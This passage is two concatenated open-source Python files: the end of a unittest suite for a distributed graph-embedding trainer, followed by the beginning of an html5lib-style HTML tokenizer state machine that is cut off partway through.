train_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[0].name],
)
eval_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[1].name],
)
# Just make sure no exceptions are raised and nothing crashes.
train(train_config, rank=0, subprocess_init=self.subprocess_init)
self.assertCheckpointWritten(train_config, version=1)
do_eval(eval_config, subprocess_init=self.subprocess_init)
def test_partitioned(self):
e1 = EntitySchema(num_partitions=1)
e2 = EntitySchema(num_partitions=2)
e3 = EntitySchema(num_partitions=3)
r1 = RelationSchema(name="r1", lhs="e1", rhs="e3")
r2 = RelationSchema(name="r2", lhs="e2", rhs="e3")
r3 = RelationSchema(name="r3", lhs="e2", rhs="e1")
base_config = ConfigSchema(
dimension=10,
relations=[r1, r2, r3],
entities={"e1": e1, "e2": e2, "e3": e3},
entity_path=None, # filled in later
edge_paths=[], # filled in later
checkpoint_path=self.checkpoint_path.name,
workers=2,
)
dataset = generate_dataset(base_config, num_entities=100, fractions=[0.4, 0.2])
self.addCleanup(dataset.cleanup)
train_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[0].name],
)
eval_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[1].name],
)
# Just make sure no exceptions are raised and nothing crashes.
train(train_config, rank=0, subprocess_init=self.subprocess_init)
self.assertCheckpointWritten(train_config, version=1)
do_eval(eval_config, subprocess_init=self.subprocess_init)
@unittest.skipIf(not torch.cuda.is_available() or not CPP_INSTALLED, "No GPU")
def test_gpu(self):
self._test_gpu()
@unittest.skipIf(not torch.cuda.is_available() or not CPP_INSTALLED, "No GPU")
def test_gpu_half(self):
self._test_gpu(do_half_precision=True)
@unittest.skipIf(not torch.cuda.is_available() or not CPP_INSTALLED, "No GPU")
def test_gpu_1partition(self):
self._test_gpu(num_partitions=1)
def _test_gpu(self, do_half_precision=False, num_partitions=2):
entity_name = "e"
relation_config = RelationSchema(name="r", lhs=entity_name, rhs=entity_name)
base_config = ConfigSchema(
dimension=16,
batch_size=1024,
num_batch_negs=64,
num_uniform_negs=64,
relations=[relation_config],
entities={entity_name: EntitySchema(num_partitions=num_partitions)},
entity_path=None, # filled in later
edge_paths=[], # filled in later
checkpoint_path=self.checkpoint_path.name,
workers=2,
num_gpus=2,
regularization_coef=1e-4,
half_precision=do_half_precision,
)
dataset = generate_dataset(base_config, num_entities=100, fractions=[0.4, 0.2])
self.addCleanup(dataset.cleanup)
train_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[0].name],
)
eval_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[1].name],
relations=[attr.evolve(relation_config, all_negs=True)],
)
# Just make sure no exceptions are raised and nothing crashes.
train(train_config, rank=0, subprocess_init=self.subprocess_init)
self.assertCheckpointWritten(train_config, version=1)
do_eval(eval_config, subprocess_init=self.subprocess_init)
def _test_distributed(self, num_partitions):
sync_path = TemporaryDirectory()
self.addCleanup(sync_path.cleanup)
e1 = "e1"
e2 = "e2"
relation_config = RelationSchema(
name="r",
lhs=e1,
rhs=e2,
operator="linear", # To exercise the parameter server.
)
base_config = ConfigSchema(
dimension=10,
relations=[relation_config],
entities={
e1: EntitySchema(num_partitions=num_partitions),
e2: EntitySchema(num_partitions=4),
},
entity_path=None, # filled in later
edge_paths=[], # filled in later
checkpoint_path=self.checkpoint_path.name,
num_machines=2,
distributed_init_method="file://%s" % os.path.join(sync_path.name, "sync"),
workers=2,
)
dataset = generate_dataset(base_config, num_entities=100, fractions=[0.4])
self.addCleanup(dataset.cleanup)
train_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[0].name],
)
# Just make sure no exceptions are raised and nothing crashes.
trainer0 = mp.get_context("spawn").Process(
name="Trainer-0",
target=partial(
call_one_after_the_other,
self.subprocess_init,
partial(
train, train_config, rank=0, subprocess_init=self.subprocess_init
),
),
)
trainer1 = mp.get_context("spawn").Process(
name="Trainer-1",
target=partial(
call_one_after_the_other,
self.subprocess_init,
partial(
train, train_config, rank=1, subprocess_init=self.subprocess_init
),
),
)
# FIXME In Python 3.7 use kill here.
self.addCleanup(trainer0.terminate)
self.addCleanup(trainer1.terminate)
trainer0.start()
trainer1.start()
done = [False, False]
while not all(done):
time.sleep(1)
if not trainer0.is_alive() and not done[0]:
self.assertEqual(trainer0.exitcode, 0)
done[0] = True
if not trainer1.is_alive() and not done[1]:
self.assertEqual(trainer1.exitcode, 0)
done[1] = True
self.assertCheckpointWritten(train_config, version=1)
def test_distributed(self):
self._test_distributed(num_partitions=4)
def test_distributed_unpartitioned(self):
self._test_distributed(num_partitions=1)
def test_distributed_with_partition_servers(self):
sync_path = TemporaryDirectory()
self.addCleanup(sync_path.cleanup)
entity_name = "e"
relation_config = RelationSchema(name="r", lhs=entity_name, rhs=entity_name)
base_config = ConfigSchema(
dimension=10,
relations=[relation_config],
entities={entity_name: EntitySchema(num_partitions=4)},
entity_path=None, # filled in later
edge_paths=[], # filled in later
checkpoint_path=self.checkpoint_path.name,
num_machines=2,
num_partition_servers=2,
distributed_init_method="file://%s" % os.path.join(sync_path.name, "sync"),
workers=2,
)
dataset = generate_dataset(base_config, num_entities=100, fractions=[0.4])
self.addCleanup(dataset.cleanup)
train_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[0].name],
)
# Just make sure no exceptions are raised and nothing crashes.
trainer0 = mp.get_context("spawn").Process(
name="Trainer-0",
target=partial(
call_one_after_the_other,
self.subprocess_init,
partial(
train, train_config, rank=0, subprocess_init=self.subprocess_init
),
),
)
trainer1 = mp.get_context("spawn").Process(
name="Trainer-1",
target=partial(
call_one_after_the_other,
self.subprocess_init,
partial(
train, train_config, rank=1, subprocess_init=self.subprocess_init
),
),
)
partition_server0 = mp.get_context("spawn").Process(
name="PartitionServer-0",
target=partial(
call_one_after_the_other,
self.subprocess_init,
partial(
run_partition_server,
train_config,
rank=0,
subprocess_init=self.subprocess_init,
),
),
)
partition_server1 = mp.get_context("spawn").Process(
name="PartitionServer-1",
target=partial(
call_one_after_the_other,
self.subprocess_init,
partial(
run_partition_server,
train_config,
rank=1,
subprocess_init=self.subprocess_init,
),
),
)
# FIXME In Python 3.7 use kill here.
self.addCleanup(trainer0.terminate)
self.addCleanup(trainer1.terminate)
self.addCleanup(partition_server0.terminate)
self.addCleanup(partition_server1.terminate)
trainer0.start()
trainer1.start()
partition_server0.start()
partition_server1.start()
done = [False, False]
while not all(done):
time.sleep(1)
if not trainer0.is_alive() and not done[0]:
self.assertEqual(trainer0.exitcode, 0)
done[0] = True
if not trainer1.is_alive() and not done[1]:
self.assertEqual(trainer1.exitcode, 0)
done[1] = True
partition_server0.join()
partition_server1.join()
logger.info(
f"Partition server 0 died with exit code {partition_server0.exitcode}"
)
logger.info(
f"Partition server 0 died with exit code {partition_server1.exitcode}"
)
self.assertCheckpointWritten(train_config, version=1)
def test_dynamic_relations(self):
relation_config = RelationSchema(name="r", lhs="el", rhs="er")
base_config = ConfigSchema(
dimension=10,
relations=[relation_config],
entities={
"el": EntitySchema(num_partitions=1),
"er": EntitySchema(num_partitions=1),
},
entity_path=None, # filled in later
edge_paths=[], # filled in later
checkpoint_path=self.checkpoint_path.name,
dynamic_relations=True,
global_emb=False, # Must be off for dynamic relations.
workers=2,
)
gen_config = attr.evolve(
base_config,
relations=[relation_config] * 10,
dynamic_relations=False, # Must be off if more than 1 relation.
)
dataset = generate_dataset(gen_config, num_entities=100, fractions=[0.04, 0.02])
self.addCleanup(dataset.cleanup)
with open(
os.path.join(dataset.entity_path.name, "dynamic_rel_count.txt"), "xt"
) as f:
f.write("%d" % len(gen_config.relations))
train_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[0].name],
)
eval_config = attr.evolve(
base_config,
relations=[attr.evolve(relation_config, all_negs=True)],
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[1].name],
)
# Just make sure no exceptions are raised and nothing crashes.
train(train_config, rank=0, subprocess_init=self.subprocess_init)
self.assertCheckpointWritten(train_config, version=1)
do_eval(eval_config, subprocess_init=self.subprocess_init)
def test_entity_dimensions(self):
entity_name = "e"
relation_config = RelationSchema(name="r", lhs=entity_name, rhs=entity_name)
base_config = ConfigSchema(
dimension=10,
relations=[relation_config],
entities={entity_name: EntitySchema(num_partitions=1, dimension=8)},
entity_path=None, # filled in later
edge_paths=[], # filled in later
checkpoint_path=self.checkpoint_path.name,
workers=2,
)
dataset = generate_dataset(base_config, num_entities=100, fractions=[0.4, 0.2])
self.addCleanup(dataset.cleanup)
train_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[0].name],
)
eval_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[1].name],
relations=[attr.evolve(relation_config, all_negs=True)],
)
# Just make sure no exceptions are raised and nothing crashes.
train(train_config, rank=0, subprocess_init=self.subprocess_init)
self.assertCheckpointWritten(train_config, version=1)
do_eval(eval_config, subprocess_init=self.subprocess_init)
if __name__ == "__main__":
main()
| {
"pile_set_name": "Github"
} |
from __future__ import absolute_import, division, unicode_literals
from six import unichr as chr
from collections import deque, OrderedDict
from sys import version_info
from .constants import spaceCharacters
from .constants import entities
from .constants import asciiLetters, asciiUpper2Lower
from .constants import digits, hexDigits, EOF
from .constants import tokenTypes, tagTokenTypes
from .constants import replacementCharacters
from ._inputstream import HTMLInputStream
from ._trie import Trie
entitiesTrie = Trie(entities)
if version_info >= (3, 7):
attributeMap = dict
else:
attributeMap = OrderedDict
class HTMLTokenizer(object):
""" This class takes care of tokenizing HTML.
* self.currentToken
Holds the token that is currently being processed.
* self.state
Holds a reference to the method to be invoked... XXX
* self.stream
Points to HTMLInputStream object.
"""
def __init__(self, stream, parser=None, **kwargs):
self.stream = HTMLInputStream(stream, **kwargs)
self.parser = parser
# Setup the initial tokenizer state
self.escapeFlag = False
self.lastFourChars = []
self.state = self.dataState
self.escape = False
# The current token being created
self.currentToken = None
super(HTMLTokenizer, self).__init__()
def __iter__(self):
""" This is where the magic happens.
We do our usually processing through the states and when we have a token
to return we yield the token which pauses processing until the next token
is requested.
"""
self.tokenQueue = deque([])
# Start processing. When EOF is reached self.state will return False
# instead of True and the loop will terminate.
while self.state():
while self.stream.errors:
yield {"type": tokenTypes["ParseError"], "data": self.stream.errors.pop(0)}
while self.tokenQueue:
yield self.tokenQueue.popleft()
def consumeNumberEntity(self, isHex):
"""This function returns either U+FFFD or the character based on the
decimal or hexadecimal representation. It also discards ";" if present.
If not present self.tokenQueue.append({"type": tokenTypes["ParseError"]}) is invoked.
"""
allowed = digits
radix = 10
if isHex:
allowed = hexDigits
radix = 16
charStack = []
# Consume all the characters that are in range while making sure we
# don't hit an EOF.
c = self.stream.char()
while c in allowed and c is not EOF:
charStack.append(c)
c = self.stream.char()
# Convert the set of characters consumed to an int.
charAsInt = int("".join(charStack), radix)
# Certain characters get replaced with others
if charAsInt in replacementCharacters:
char = replacementCharacters[charAsInt]
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"illegal-codepoint-for-numeric-entity",
"datavars": {"charAsInt": charAsInt}})
elif ((0xD800 <= charAsInt <= 0xDFFF) or
(charAsInt > 0x10FFFF)):
char = "\uFFFD"
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"illegal-codepoint-for-numeric-entity",
"datavars": {"charAsInt": charAsInt}})
else:
# Should speed up this check somehow (e.g. move the set to a constant)
if ((0x0001 <= charAsInt <= 0x0008) or
(0x000E <= charAsInt <= 0x001F) or
(0x007F <= charAsInt <= 0x009F) or
(0xFDD0 <= charAsInt <= 0xFDEF) or
charAsInt in frozenset([0x000B, 0xFFFE, 0xFFFF, 0x1FFFE,
0x1FFFF, 0x2FFFE, 0x2FFFF, 0x3FFFE,
0x3FFFF, 0x4FFFE, 0x4FFFF, 0x5FFFE,
0x5FFFF, 0x6FFFE, 0x6FFFF, 0x7FFFE,
0x7FFFF, 0x8FFFE, 0x8FFFF, 0x9FFFE,
0x9FFFF, 0xAFFFE, 0xAFFFF, 0xBFFFE,
0xBFFFF, 0xCFFFE, 0xCFFFF, 0xDFFFE,
0xDFFFF, 0xEFFFE, 0xEFFFF, 0xFFFFE,
0xFFFFF, 0x10FFFE, 0x10FFFF])):
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data":
"illegal-codepoint-for-numeric-entity",
"datavars": {"charAsInt": charAsInt}})
try:
# Try/except needed as UCS-2 Python builds' unichar only works
# within the BMP.
char = chr(charAsInt)
except ValueError:
v = charAsInt - 0x10000
char = chr(0xD800 | (v >> 10)) + chr(0xDC00 | (v & 0x3FF))
# Discard the ; if present. Otherwise, put it back on the queue and
# invoke parseError on parser.
if c != ";":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"numeric-entity-without-semicolon"})
self.stream.unget(c)
return char
def consumeEntity(self, allowedChar=None, fromAttribute=False):
# Initialise to the default output for when no entity is matched
output = "&"
charStack = [self.stream.char()]
if (charStack[0] in spaceCharacters or charStack[0] in (EOF, "<", "&") or
(allowedChar is not None and allowedChar == charStack[0])):
self.stream.unget(charStack[0])
elif charStack[0] == "#":
# Read the next character to see if it's hex or decimal
hex = False
charStack.append(self.stream.char())
if charStack[-1] in ("x", "X"):
hex = True
charStack.append(self.stream.char())
# charStack[-1] should be the first digit
if (hex and charStack[-1] in hexDigits) \
or (not hex and charStack[-1] in digits):
# At least one digit found, so consume the whole number
self.stream.unget(charStack[-1])
output = self.consumeNumberEntity(hex)
else:
# No digits found
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "expected-numeric-entity"})
self.stream.unget(charStack.pop())
output = "&" + "".join(charStack)
else:
# At this point in the process might have named entity. Entities
# are stored in the global variable "entities".
#
# Consume characters and compare to these to a substring of the
# entity names in the list until the substring no longer matches.
while (charStack[-1] is not EOF):
if not entitiesTrie.has_keys_with_prefix("".join(charStack)):
break
charStack.append(self.stream.char())
# At this point we have a string that starts with some characters
# that may match an entity
# Try to find the longest entity the string will match to take care
# of ¬i for instance.
try:
entityName = entitiesTrie.longest_prefix("".join(charStack[:-1]))
entityLength = len(entityName)
except KeyError:
entityName = None
if entityName is not None:
if entityName[-1] != ";":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"named-entity-without-semicolon"})
if (entityName[-1] != ";" and fromAttribute and
(charStack[entityLength] in asciiLetters or
charStack[entityLength] in digits or
charStack[entityLength] == "=")):
self.stream.unget(charStack.pop())
output = "&" + "".join(charStack)
else:
output = entities[entityName]
self.stream.unget(charStack.pop())
output += "".join(charStack[entityLength:])
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-named-entity"})
self.stream.unget(charStack.pop())
output = "&" + "".join(charStack)
if fromAttribute:
self.currentToken["data"][-1][1] += output
else:
if output in spaceCharacters:
tokenType = "SpaceCharacters"
else:
tokenType = "Characters"
self.tokenQueue.append({"type": tokenTypes[tokenType], "data": output})
def processEntityInAttribute(self, allowedChar):
"""This method replaces the need for "entityInAttributeValueState".
"""
self.consumeEntity(allowedChar=allowedChar, fromAttribute=True)
def emitCurrentToken(self):
"""This method is a generic handler for emitting the tags. It also sets
the state to "data" because that's what's needed after a token has been
emitted.
"""
token = self.currentToken
# Add token to the queue to be yielded
if (token["type"] in tagTokenTypes):
token["name"] = token["name"].translate(asciiUpper2Lower)
if token["type"] == tokenTypes["StartTag"]:
raw = token["data"]
data = attributeMap(raw)
if len(raw) > len(data):
# we had some duplicated attribute, fix so first wins
data.update(raw[::-1])
token["data"] = data
if token["type"] == tokenTypes["EndTag"]:
if token["data"]:
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "attributes-in-end-tag"})
if token["selfClosing"]:
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "self-closing-flag-on-end-tag"})
self.tokenQueue.append(token)
self.state = self.dataState
# Below are the various tokenizer states worked out.
def dataState(self):
data = self.stream.char()
if data == "&":
self.state = self.entityDataState
elif data == "<":
self.state = self.tagOpenState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\u0000"})
elif data is EOF:
# Tokenization ends.
return False
elif data in spaceCharacters:
# Directly after emitting a token you switch back to the "data
# state". At that point spaceCharacters are important so they are
# emitted separately.
self.tokenQueue.append({"type": tokenTypes["SpaceCharacters"], "data":
data + self.stream.charsUntil(spaceCharacters, True)})
# No need to update lastFourChars here, since the first space will
# have already been appended to lastFourChars and will have broken
# any <!-- or --> sequences
else:
chars = self.stream.charsUntil(("&", "<", "\u0000"))
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + chars})
return True
def entityDataState(self):
self.consumeEntity()
self.state = self.dataState
return True
def rcdataState(self):
data = self.stream.char()
if data == "&":
self.state = self.characterReferenceInRcdata
elif data == "<":
self.state = self.rcdataLessThanSignState
elif data == EOF:
# Tokenization ends.
return False
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
elif data in spaceCharacters:
# Directly after emitting a token you switch back to the "data
# state". At that point spaceCharacters are important so they are
# emitted separately.
self.tokenQueue.append({"type": tokenTypes["SpaceCharacters"], "data":
data + self.stream.charsUntil(spaceCharacters, True)})
# No need to update lastFourChars here, since the first space will
# have already been appended to lastFourChars and will have broken
# any <!-- or --> sequences
else:
chars = self.stream.charsUntil(("&", "<", "\u0000"))
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + chars})
return True
def characterReferenceInRcdata(self):
self.consumeEntity()
self.state = self.rcdataState
return True
def rawtextState(self):
data = self.stream.char()
if data == "<":
self.state = self.rawtextLessThanSignState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
elif data == EOF:
# Tokenization ends.
return False
else:
chars = self.stream.charsUntil(("<", "\u0000"))
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + chars})
return True
def scriptDataState(self):
data = self.stream.char()
if data == "<":
self.state = self.scriptDataLessThanSignState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
elif data == EOF:
# Tokenization ends.
return False
else:
chars = self.stream.charsUntil(("<", "\u0000"))
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + chars})
return True
def plaintextState(self):
data = self.stream.char()
if data == EOF:
# Tokenization ends.
return False
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + self.stream.charsUntil("\u0000")})
return True
def tagOpenState(self):
data = self.stream.char()
if data == "!":
self.state = self.markupDeclarationOpenState
elif data == "/":
self.state = self.closeTagOpenState
elif data in asciiLetters:
self.currentToken = {"type": tokenTypes["StartTag"],
"name": data, "data": [],
"selfClosing": False,
"selfClosingAcknowledged": False}
self.state = self.tagNameState
elif data == ">":
# XXX In theory it could be something besides a tag name. But
# do we really care?
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-tag-name-but-got-right-bracket"})
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<>"})
self.state = self.dataState
elif data == "?":
# XXX In theory it could be something besides a tag name. But
# do we really care?
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-tag-name-but-got-question-mark"})
self.stream.unget(data)
self.state = self.bogusCommentState
else:
# XXX
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-tag-name"})
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.stream.unget(data)
self.state = self.dataState
return True
def closeTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.currentToken = {"type": tokenTypes["EndTag"], "name": data,
"data": [], "selfClosing": False}
self.state = self.tagNameState
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-closing-tag-but-got-right-bracket"})
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-closing-tag-but-got-eof"})
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"})
self.state = self.dataState
else:
# XXX data can be _'_...
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-closing-tag-but-got-char",
"datavars": {"data": data}})
self.stream.unget(data)
self.state = self.bogusCommentState
return True
def tagNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeAttributeNameState
elif data == ">":
self.emitCurrentToken()
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-tag-name"})
self.state = self.dataState
elif data == "/":
self.state = self.selfClosingStartTagState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["name"] += "\uFFFD"
else:
self.currentToken["name"] += data
# (Don't use charsUntil here, because tag names are
# very short and it's faster to not do anything fancy)
return True
def rcdataLessThanSignState(self):
data = self.stream.char()
if data == "/":
self.temporaryBuffer = ""
self.state = self.rcdataEndTagOpenState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.stream.unget(data)
self.state = self.rcdataState
return True
def rcdataEndTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.temporaryBuffer += data
self.state = self.rcdataEndTagNameState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"})
self.stream.unget(data)
self.state = self.rcdataState
return True
def rcdataEndTagNameState(self):
appropriate = self.currentToken and self.currentToken["name"].lower() == self.temporaryBuffer.lower()
data = self.stream.char()
if data in spaceCharacters and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.beforeAttributeNameState
elif data == "/" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.selfClosingStartTagState
elif data == ">" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.emitCurrentToken()
self.state = self.dataState
elif data in asciiLetters:
self.temporaryBuffer += data
else:
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "</" + self.temporaryBuffer})
self.stream.unget(data)
self.state = self.rcdataState
return True
def rawtextLessThanSignState(self):
data = self.stream.char()
if data == "/":
self.temporaryBuffer = ""
self.state = self.rawtextEndTagOpenState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.stream.unget(data)
self.state = self.rawtextState
return True
def rawtextEndTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.temporaryBuffer += data
self.state = self.rawtextEndTagNameState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"})
self.stream.unget(data)
self.state = self.rawtextState
return True
def rawtextEndTagNameState(self):
appropriate = self.currentToken and self.currentToken["name"].lower() == self.temporaryBuffer.lower()
data = self.stream.char()
if data in spaceCharacters and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.beforeAttributeNameState
elif data == "/" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.selfClosingStartTagState
elif data == ">" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.emitCurrentToken()
self.state = self.dataState
elif data in asciiLetters:
self.temporaryBuffer += data
else:
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "</" + self.temporaryBuffer})
self.stream.unget(data)
self.state = self.rawtextState
return True
def scriptDataLessThanSignState(self):
data = self.stream.char()
if data == "/":
self.temporaryBuffer = ""
self.state = self.scriptDataEndTagOpenState
elif data == "!":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<!"})
self.state = self.scriptDataEscapeStartState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEndTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.temporaryBuffer += data
self.state = self.scriptDataEndTagNameState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"})
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEndTagNameState(self):
appropriate = self.currentToken and self.currentToken["name"].lower() == self.temporaryBuffer.lower()
data = self.stream.char()
if data in spaceCharacters and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.beforeAttributeNameState
elif data == "/" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.selfClosingStartTagState
elif data == ">" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.emitCurrentToken()
self.state = self.dataState
elif data in asciiLetters:
self.temporaryBuffer += data
else:
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "</" + self.temporaryBuffer})
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEscapeStartState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
self.state = self.scriptDataEscapeStartDashState
else:
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEscapeStartDashState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
self.state = self.scriptDataEscapedDashDashState
else:
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEscapedState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
self.state = self.scriptDataEscapedDashState
elif data == "<":
self.state = self.scriptDataEscapedLessThanSignState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
elif data == EOF:
self.state = self.dataState
else:
chars = self.stream.charsUntil(("<", "-", "\u0000"))
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + chars})
return True
def scriptDataEscapedDashState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
self.state = self.scriptDataEscapedDashDashState
elif data == "<":
self.state = self.scriptDataEscapedLessThanSignState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
self.state = self.scriptDataEscapedState
elif data == EOF:
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
self.state = self.scriptDataEscapedState
return True
def scriptDataEscapedDashDashState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
elif data == "<":
self.state = self.scriptDataEscapedLessThanSignState
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": ">"})
self.state = self.scriptDataState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
self.state = self.scriptDataEscapedState
elif data == EOF:
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
self.state = self.scriptDataEscapedState
return True
def scriptDataEscapedLessThanSignState(self):
data = self.stream.char()
if data == "/":
self.temporaryBuffer = ""
self.state = self.scriptDataEscapedEndTagOpenState
elif data in asciiLetters:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<" + data})
self.temporaryBuffer = data
self.state = self.scriptDataDoubleEscapeStartState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.stream.unget(data)
self.state = self.scriptDataEscapedState
return True
def scriptDataEscapedEndTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.temporaryBuffer = data
self.state = self.scriptDataEscapedEndTagNameState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"})
self.stream.unget(data)
self.state = self.scriptDataEscapedState
return True
def scriptDataEscapedEndTagNameState(self):
appropriate = self.currentToken and self.currentToken["name"].lower() == self.temporaryBuffer.lower()
data = self.stream.char()
if data in spaceCharacters and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.beforeAttributeNameState
elif data == "/" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.selfClosingStartTagState
elif data == ">" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.emitCurrentToken()
self.state = self.dataState
elif data in asciiLetters:
self.temporaryBuffer += data
else:
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "</" + self.temporaryBuffer})
